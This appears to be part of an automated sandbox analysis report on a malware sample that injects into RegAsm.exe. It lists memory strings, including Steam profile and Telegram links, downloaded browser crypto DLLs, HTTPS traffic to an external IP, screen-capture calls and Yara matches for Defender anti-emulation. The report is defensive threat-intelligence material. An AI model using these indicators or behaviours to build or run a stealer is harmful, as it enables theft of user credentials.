                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/tIP
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: KJKJJJ.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                  Source: file.exe, 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, GCGDGH.2.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                  Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: HIEBAK.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: HIEBAK.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIEBFHIDBA
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%2
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_004112FD

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B8C0 rand_s,NtQueryVirtualMemory,2_2_6C81B8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C81B910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C81B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C7BF280
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB22A00_2_00AB22A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB2ED00_2_00AB2ED0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC817B0_2_00AC817B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC4D2F0_2_00AC4D2F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C07A2_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E1902_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BB292_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CCA72_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B35A02_2_6C7B35A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F5C102_2_6C7F5C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82AC002_2_6C82AC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F6CF02_2_6C7F6CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C802C102_2_6C802C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C6C802_2_6C7C6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DED102_2_6C7DED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CFD002_2_6C7CFD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F0DD02_2_6C7F0DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C814EA02_2_6C814EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D9E502_2_6C7D9E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F3E502_2_6C7F3E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F7E102_2_6C7F7E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BBEF02_2_6C7BBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CFEF02_2_6C7CFEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C819E302_2_6C819E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C802E4E2_2_6C802E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C826E632_2_6C826E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D5E902_2_6C7D5E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C9F002_2_6C7C9F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E6FF02_2_6C7E6FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BDFE02_2_6C7BDFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D88502_2_6C7D8850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DD8502_2_6C7DD850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FB8202_2_6C7FB820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C78102_2_6C7C7810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F58E02_2_6C7F58E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8048202_2_6C804820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8129902_2_6C812990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CD9602_2_6C7CD960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DA9402_2_6C7DA940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7ED9B02_2_6C7ED9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BC9A02_2_6C7BC9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C80B9702_2_6C80B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82BA902_2_6C82BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F9A602_2_6C7F9A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C822AB02_2_6C822AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D1AF02_2_6C7D1AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F8AC02_2_6C7F8AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CCAB02_2_6C7CCAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E4AA02_2_6C7E4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8134A02_2_6C8134A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81C4A02_2_6C81C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C54402_2_6C7C5440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BD4E02_2_6C7BD4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82542B2_2_6C82542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DD4D02_2_6C7DD4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C64C02_2_6C7C64C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82545C2_2_6C82545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E05122_2_6C7E0512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8185F02_2_6C8185F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81E6802_2_6C81E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BC6702_2_6C7BC670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D46402_2_6C7D4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8276E32_2_6C8276E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8056002_2_6C805600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8077A02_2_6C8077A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F77102_2_6C7F7710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FF0702_2_6C7FF070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8250C72_2_6C8250C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DC0E02_2_6C7DC0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E60A02_2_6C7E60A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F51902_2_6C7F5190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82B1702_2_6C82B170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FE2F02_2_6C7FE2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B22A02_2_6C7B22A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CC3702_2_6C7CC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B53402_2_6C7B5340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8253C82_2_6C8253C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FD3202_2_6C7FD320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BF3802_2_6C7BF380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C85ECC02_2_6C85ECC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8BECD02_2_6C8BECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C926C002_2_6C926C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93AC302_2_6C93AC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86AC602_2_6C86AC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F6D902_2_6C8F6D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C864DB02_2_6C864DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9ECDC02_2_6C9ECDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E8D202_2_6C9E8D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C98AD502_2_6C98AD50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C92ED702_2_6C92ED70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8E6E902_2_6C8E6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86AEC02_2_6C86AEC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C900EC02_2_6C900EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C940E202_2_6C940E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FEE702_2_6C8FEE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A8FB02_2_6C9A8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86EFB02_2_6C86EFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93EFF02_2_6C93EFF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C860FE02_2_6C860FE0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AB6770 appears 51 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C9E09D0 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7ECBE8 appears 134 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7F94D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
